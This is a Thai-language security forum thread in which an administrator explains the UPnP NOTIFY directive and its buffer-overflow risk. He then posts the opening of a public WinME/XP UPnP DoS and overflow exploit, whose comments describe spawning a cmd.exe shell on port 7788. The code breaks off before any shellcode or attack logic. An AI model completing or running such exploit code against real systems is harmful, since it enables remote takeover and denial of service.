Results 1 to 2 of 2

Thread: notify

  1. #1
    Junior Member
    Join Date
    Nov 2006
    Posts
    0


    Wink

    **Hidden Content: To see this hidden content your post count must be 1 or greater.**

  2. #2
    Administrator asylu3's Avatar
    Join Date
    Jun 2000
    Location
    Thailand
    Posts
    3,557


    เอาเท่าที่ทราบนะครับ

    NOTIFY directive
    คือ ส่วนประกอบหนึ่งของ UPnP (Universal Plug and Play) ระบบที่ทำการตรวจสอบการเพิ่มลดของ hardware เพื่อให้สามารถทำงานแบบ Plug&Play ได้ตัวอย่างเช่น เมื่อมีอุปกรณ์ network ใหม่เสียบเข้ากับเครื่องระบบนี้จะทำการแจ้ง NOTIFY directive ออกมาบอกให้กับเครื่องอื่นใน Network ที่ได้ทำการ Enable UPnP. ด้วยเหตุนี้เองหากผู้ไม่หวังดีทำการใช้ Technique buffer overflow แทรกคำสั่งที่ไม่พึงประสงค์ลงไปในระบบนี้ได้อาจจะทำให้ Hacker สามารถเจาะเข้าไปยังระบบของเป้าหมายได้ หรือไม่ก็อาจจะสามารถทำการโจมตีแบบ Denial of Service ไปยังเครื่องเป้าหมายได้

    เท่าที่ทราบตอนนี้ ก็มี Code Exploit ให้ศึกษาสองดูด้านล่างนี้


    [hide=15][code]/*
    * WinME/XP UPNP dos & overflow
    *
    * Run: ./XPloit host <option>
    *
    * Windows run the "Universal Plug and Play technology" service
    * at port 5000. In the future this will allow for seemless
    * connectivity of various devices such as a printer.
    * This service have a DoS and a buffer overflow I exploit here.
    *
    * PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
    *
    * Author: Gabriel Maggiotti
    * Email: gmaggiot@ciudad.com.ar
    * Webpage: http://qb0x.net
    */

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <sys/wait.h>
    #include <unistd.h>
    #include <fcntl.h>

    #define MAX 10000
    #define PORT 5000
    #define FREEZE 512
    #define NOP 0x43 //inc ebx, instead of 0x90

    /***************************************************************************/

    int main(int argc,char *argv[])
    {
    int sockfd[MAX];
    char sendXP[]="XP";
    char jmpcode[281], execode[840],request[2048];
    char *send_buffer;
    int num_socks;
    int bindport;
    int i;
    int port;

    unsigned char shellcode[] =

Similar Threads

  1. Replies: 0
    Last Post: 01-05-2009, 01:29 PM
  2. Replies: 0
    Last Post: 04-11-2006, 05:58 AM

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •